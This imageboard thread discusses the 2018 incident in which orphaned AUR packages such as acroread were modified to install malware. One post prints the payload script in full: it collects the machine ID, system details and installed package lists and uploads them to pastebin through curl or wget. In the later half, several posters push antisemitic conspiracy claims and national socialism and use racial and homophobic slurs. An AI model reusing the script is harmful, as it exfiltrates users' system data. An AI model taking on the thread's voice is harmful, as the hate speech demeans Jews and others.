Malware in AUR

Archfags BTFO again
archive.fo/yeSaS

Attached: af-1.png (1465x1007, 66.82K)

Other urls found in this thread:

my.mixtape.moe/imdluy.png
twitter.com/NSFWRedditImage

I have used Arch for several years and have never used AUR. I remain unBTFO. Sorry to disappoint.

I used Arch back in 2010 or so. I don't remember exactly now but they had a big file system change when I was on vacation for a week and when I updated my system it got trashed.
Switched to Gentoo and was okay until last year when my 4 different versions of Python have lead to being unable to do most things with portage...

Old news. These three compromised packages, allegedly linked to cryptomining shit, were quickly removed.

AUR is similar to the Jewgle Play Store because of:

Who would have thonk?
I'm on ubuntu though, not into memes.

>"The security investigation shows that shows that a malicious user with the nick name xeactor modified in June 7 an orphaned package (software without an active maintainer) called acroread. The changes included a curl script that downloads and runs a script from a remote site. This installs a persistent software that reconfigures (((systemd))) in order to start periodically. While it appears that they are not a serious threat to the security of the infected hosts, the scripts can be manipulated at any time to include arbitrary code. Two other packages were modified in the same manner."

I think I was on a *buntu variant at the time, so I didn't experience that. I've run Gentoo at various times in the past and have also run into portage flakeouts.

Eventually, I came to realize that what the mutt devs said about email clients is true about all software. All software sucks; some just sucks less. It all sucks in different ways and to different degrees, but it all sucks.

Yeah, AUR sucks. At one time, a Debian fuckup resulted in a huge % of the world's RSA keys being trivially breakable. Ubuntu spied on its users. The Mint download servers were compromised and were serving malicious downloads. OpenBSD had an FBI plant working on their IPSec implementation (whoops). Then there's the shit sandwiches that are Windows and Mac OS. Too many layers to count.

All software sucks.

Some people installing AUR packages from random xX1337k0|)3RXx got pwned? Yawn.

Aka the excuse for having tiny as fuck repos. Arch is shit and has always been.

ITT: Nobody has read the scripts

It's a shitty systemd timer script that pastebins your system info. They didn't get anyone.

Does it even work? What does $uploader do here, shouldn't it be upload?

#!/bin/bashfunction urle() { sed -e 's|!|%21|' -e 's|#|%23|' -e 's|$|%24|' -e 's|&|%26|' -e "s|'|%27|" -e 's|(|%28|' -e 's|)|%29|' -e 's|*|%2a|' -e 's|+|%2b|' -e 's|,|%2c|' -e 's|/|%2f|' -e 's|:|%3a|' -e 's|;|%3b|' -e 's|=|%3d|' -e 's|?|%3f|' -e 's|@|%40|' -e 's|\[|%5b|' -e 's|]|%5d|'}declare -fx urleGID=MACHINE_ID="$(cat /etc/machine-id)"PASTE_TITLE="$(echo [xeactor]\ $MACHINE_ID|urle)"upload() { up_data="$(echo $1|urle)" if [[ "$HTTP_CLIENT" == "curl" ]]; then prefix='curl -s --data' elif [[ "$HTTP_CLIENT" == "wget" ]]; then prefix='wget -O/dev/null -q --post-data' fi $prefix "api_dev_key=42ba93112cc9677382e55e5e387eafa1&api_paste_private=0&api_paste_name=${PASTE_TITLE}&api_option=paste&api_paste_code=$up_data" "pastebin.com/api/api_post.php" >/dev/null 2>&1}if which wget >/dev/null 2>&1; then export HTTP_CLIENT=wgetelif which curl >/dev/null 2>&1; then export HTTP_CLIENT=curlelse exit 0ficmd_log() { echo "[cmd] \`$@\`:"; "$@" 2>&1; echo; }full_log() { echo ${MACHINE_ID} cmd_log date '+%s' cmd_log uname -a cmd_log id cmd_log lscpu cmd_log pacman -Qeq cmd_log pacman -Qdq cmd_log systemctl list-units}FULL_LOG="$(full_log)"$uploader "$FULL_LOG"for x in /root /home/*; do if [[ -w "$x/compromised.txt" ]]; then echo "$FULL_LOG" > "$x/compromised.txt" fidoneexit 0

Lol archfags bfto, good thing we dont use that huh /g?

So it uploads your system info to pastebin and drops a copy titled compromised.txt into every folder to spook you? Do you join a botnet and mine bitcoin too, or is that it? Just curious. I'm glad I don't use Arch, but I can't say I'm not already fucked since I still don't audit every line of code or even compile from source most of the time.

Yeah $uploader is wrong.

I've used AUR twice, I think. The one thing I remember, though, is all of the flashing red text in yaourt saying
warning: potentially dangerous!
Because they aren't in the official repos and are, therefore, dangerous. People using the AUR should absolutely be careful and they have been informed. This isn't arch or their fault.

It literally says this in the first words of the article.

Attached: Screenshot_20180714-115820_1.png (1080x1510, 249.41K)

but mainly

Linux is malware by definition. Stop using kike trash and use a real OS.

You sound like my boomer dad who has been jedi mindtricked into thinking capitalism is communism and vice versa please save me from my slav predicament.

Capitalism and Communism are both Jewish. Accept the third position.

You should try to judge people by who they are, not being assfag thinking there exists some evil cabala trying to shit the world and people for three thousand years. Yes, you can explain everything with "muh jews", everything is "grander scheme" and everything I do or others do is jewish because I think so. You think of them as if jews were god(s) and nobody can have a will independent of muh jews.
I would laugh if you werent that much of a nigger.

...

Yeah, despite it's occasional good points Arch is a real fucking pain in the ass.

I might just give up and switch my linux box back to *buntu. It's shit too, but at least it mostly works ok.

A group of rats that has been wrecking havoc in the world for a few thousand years.
"Everything" is jewish because anything else is destroyed ruthlessly; that's the concept of controlling both sides (and always two sides) to give an illusion of freedom.
Mate, it's okay to be ignorant, but rolling in it like it's something to be proud of is pretty low. Jews are indeed responsible (directly and indirectly) for almost every problem these days; except Western decadence. They're just surfing on it and bolstering it to exterminate Europeans.
Like I said, they're just using our decadence. And you don't need to be strong to take the lollipop of a kid, just mean. That's exactly why Jews can do what they do, they exploit the empathy of other nations to trick them into killing themselves.
They've consolidated their positions for a few hundred years in Europe and the US; their control of the pleb is indeed near godlike, right now.
Certainly not retards like you.

Different user, by the way.

Back to r/the_don with you

keep Zig Forums in Zig Forums you mongoloids. you will convince anybody if you derail thread after thread, annoying the shit out of everybody.
back to reddit

pretty sure that's JIDF central these days.

What is "r/the_don"? What does the "r/" means?

(((LISP OS when?)))

already made a logo
my.mixtape.moe/imdluy.png

so if a package is orphaned, everybody can edit them without any limits, is that correct?

I think it's from the website he came from and he let it slip.

...

I didn't know Scot are Jews

Attached: e535b3f36821369ab9a70cd792913444f44e697b1f1940ac1b6115517f558d7f.jpg (485x391, 35.12K)

Like?

capitalism and communism are different side of the same shekel. In one system you're fucked in the ass by corporations in the other by the government, both run by kikes.

third position is national socialism, where did you get Bolsheviks from ? lol

Attached: 114bb5eabe1989b15aab3e9febe73002499d673b2af203700a09b195291b0388.jpg (480x448, 77.36K)

You believe that national socialism isn't run by kikes? Fuck off kike.

Every time anyone attempts a LISP OS it fails horribly because LISP is actually a shitty family.

Attached: absolutely disgusting.jpg (720x540, 74.16K)